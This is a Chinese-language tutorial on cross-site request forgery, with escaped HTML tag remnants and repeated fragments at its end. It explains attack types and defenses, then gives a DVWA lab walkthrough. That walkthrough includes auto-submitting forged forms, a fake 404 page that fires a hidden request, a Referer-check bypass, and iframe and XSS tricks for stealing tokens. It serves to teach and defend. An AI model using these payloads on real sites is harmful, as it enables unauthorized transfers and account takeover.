CSRF漏洞全面解析与防御指南<\/h1>

一、CSRF漏洞概述<\/h2>
CSRF（Cross Site Request Forgery，跨站请求伪造）是一种网络攻击手段，攻击者通过伪装成受信任用户来执行未经授权的操作。<\/p>

1.1 CSRF与XSS的区别<\/h3>

XSS：利用受信任的用户<\/li>

CSRF：伪装成受信任用户<\/li> <\/ul>

虽然CSRF被认为比XSS危险性低，但仍需高度重视。<\/p>

二、CSRF攻击原理<\/h2>

2.1 攻击分类<\/h3>

狭义CSRF<\/strong>：攻击者将代码植入受害用户访问的页面，以"受害用户"身份向服务端发起伪造请求<\/li>

广义CSRF<\/strong>：攻击者预测HTTP接口所有参数，任意调用接口执行CURD操作<\/li> <\/ol>
2.2 攻击条件<\/h3>

受害者已登录目标网站并在本地生成cookie<\/li>
在cookie未过期时，受害者访问了攻击者页面（使用同一浏览器）<\/li> <\/ol>
三、CSRF攻击实现方式<\/h2>
3.1 GET型攻击<\/h3>
示例：银行转账漏洞<\/p>
http:\/\/csrfxj.com\/zhuanzhang.php?name=ls&money=100000 <\/code><\/pre> 隐蔽技术<\/strong>：<\/p> 利用a标签隐藏<\/li> 使用HTML的src属性（页面不显示）<\/li> 使用background属性的url功能<\/li> <\/ol> 3.2 POST型攻击<\/h3> 使用自动提交表单：<\/p> <form<\/span> name<\/span>=<\/span>"csrf"<\/span> action<\/span>=<\/span>"http:\/\/edu.xss.tv\/payload\/xss\/csrf2.php"<\/span> method<\/span>=<\/span>"post"<\/span>> <\/span><\/span> <input<\/span> type<\/span>=<\/span>"hidden"<\/span> name<\/span>=<\/span>"name"<\/span> value<\/span>=<\/span>"zhangsan520"<\/span>> <\/span><\/span> <input<\/span> type<\/span>=<\/span>"hidden"<\/span> name<\/span>=<\/span>"money"<\/span> value<\/span>=<\/span>"1000"<\/span>> <\/span><\/span><\/form<\/span>> <\/span><\/span><script<\/span> type<\/span>=<\/span>"text\/javascript"<\/span>>document.csrf<\/span>.submit<\/span>();<\/script<\/span>> <\/span><\/span><\/code><\/pre>四、CSRF漏洞检测<\/h2> 使用Burp Suite的CSRF POC功能：<\/p> 抓取目标请求<\/li> 生成攻击页面<\/li> 修改参数测试功能是否生效<\/li> <\/ol> 五、CSRF防御措施<\/h2> 5.1 前端防御<\/h3> SameSite Cookie属性<\/strong>：<\/p> Strict<\/code>：完全禁止跨站发送Cookie<\/li> Lax<\/code>：宽松模式，部分导航GET请求可带Cookie<\/li> None<\/code>：关闭SameSite（必须同时设置Secure属性）<\/li> <\/ul> 5.2 后端防御<\/h3> CSRF Token<\/strong>：<\/p> 表单页面生成随机Token<\/li> 后端存储并验证Token<\/li> <\/ul> <\/li> Referer检查<\/strong>：<\/p> 验证请求头中的Referer字段是否来自可信源<\/li> <\/ul> <\/li> <\/ol> 六、DVWA靶场实战<\/h2> 6.1 Low级别<\/h3> 直接修改URL参数即可攻击：<\/p> http:\/\/127.0.0.1\/DVWA\/vulnerabilities\/csrf\/?password_new=root&password_conf=root&Change=Change# <\/code><\/pre> 隐蔽攻击页面示例<\/strong>：<\/p> <!DOCTYPE html><\/span> <\/span><\/span><html<\/span>> <\/span><\/span><head<\/span>> <\/span><\/span> <title<\/span>>404<\/title<\/span>> <\/span><\/span><\/head<\/span>> <\/span><\/span><body<\/span>> <\/span><\/span><h1<\/span>>Not Found<\/h1<\/span>> <\/span><\/span><image<\/span> src<\/span>=<\/span>"攻击URL"<\/span> \/> <\/span><\/span><p<\/span>>The requested URL was not found on this server.<\/p<\/span>> <\/span><\/span><\/body<\/span>> <\/span><\/span><\/html<\/span>> <\/span><\/span><\/code><\/pre>6.2 Medium级别<\/h3> 防御：检查HTTP_REFERER是否包含SERVER_NAME<\/p> 绕过方法：将攻击页面命名为本地IP地址<\/p> 6.3 High级别<\/h3> 防御：使用Token机制<\/p> 绕过方法<\/strong>：<\/p> 结合XSS获取Token：<\/li> <\/ol> alert<\/span>(document.cookie<\/span>); <\/span><\/span>var<\/span> theUrl<\/span> =<\/span> 'http:\/\/127.0.0.1\/DVWA\/vulnerabilities\/csrf\/'<\/span>; <\/span><\/span>\/\/ XMLHttpRequest代码获取Token... <\/span><\/span><\/span><\/code><\/pre> 使用iframe获取Token：<\/li> <\/ol> <iframe<\/span> src<\/span>=<\/span>"..\/csrf"<\/span> onload<\/span>=<\/span>alert(frames[0].document.getElementsByName('user_token')[0].value)<\/span>> <\/span><\/span><\/code><\/pre> 构造自动提交表单：<\/li> <\/ol> <form<\/span> method<\/span>=<\/span>"GET"<\/span> action<\/span>=<\/span>"http:\/\/127.0.0.1\/dvwa\/vulnerabilities\/csrf"<\/span>> <\/span><\/span> <input<\/span> type<\/span>=<\/span>"hidden"<\/span> name<\/span>=<\/span>"password_new"<\/span> value<\/span>=<\/span>"password"<\/span>> <\/span><\/span> <input<\/span> type<\/span>=<\/span>"hidden"<\/span> name<\/span>=<\/span>"password_conf"<\/span> value<\/span>=<\/span>"password"<\/span>> <\/span><\/span> <input<\/span> type<\/span>=<\/span>'hidden'<\/span> name<\/span>=<\/span>'user_token'<\/span> value<\/span>=<\/span>"获取的Token"<\/span>> <\/span><\/span> <input<\/span> type<\/span>=<\/span>"hidden"<\/span> name<\/span>=<\/span>"Change"<\/span> value<\/span>=<\/span>"Change"<\/span> id<\/span>=<\/span>"onlick"<\/span>> <\/span><\/span><\/form<\/span>> <\/span><\/span><script<\/span>>document.getElementById<\/span>("onclick"<\/span>).click<\/span>();<\/script<\/span>> <\/span><\/span><\/code><\/pre>七、总结<\/h2> CSRF攻击虽然不如XSS流行，但危害性不容忽视。防御CSRF需要前后端协同配合，推荐使用CSRF Token+SameSite Cookie的组合防御方案。在实际开发中，应避免仅依赖Referer检查等可绕过的防御措施。<\/p>

CSRF漏洞全面解析与防御指南<\/h1>

一、CSRF漏洞概述<\/h2> CSRF（Cross Site Request Forgery，跨站请求伪造）是一种网络攻击手段，攻击者通过伪装成受信任用户来执行未经授权的操作。<\/p>

二、CSRF攻击原理<\/h2>

三、CSRF攻击实现方式<\/h2>

五、CSRF防御措施<\/h2>

六、DVWA靶场实战<\/h2>

6.2 Medium级别<\/h3> 防御：检查HTTP_REFERER是否包含SERVER_NAME<\/p> 绕过方法：将攻击页面命名为本地IP地址<\/p>

七、总结<\/h2> CSRF攻击虽然不如XSS流行，但危害性不容忽视。防御CSRF需要前后端协同配合，推荐使用CSRF Token+SameSite Cookie的组合防御方案。在实际开发中，应避免仅依赖Referer检查等可绕过的防御措施。<\/p>

一、CSRF漏洞概述<\/h2>
CSRF（Cross Site Request Forgery，跨站请求伪造）是一种网络攻击手段，攻击者通过伪装成受信任用户来执行未经授权的操作。<\/p>

6.2 Medium级别<\/h3>
防御：检查HTTP_REFERER是否包含SERVER_NAME<\/p>
绕过方法：将攻击页面命名为本地IP地址<\/p>

七、总结<\/h2>
CSRF攻击虽然不如XSS流行，但危害性不容忽视。防御CSRF需要前后端协同配合，推荐使用CSRF Token+SameSite Cookie的组合防御方案。在实际开发中，应避免仅依赖Referer检查等可绕过的防御措施。<\/p>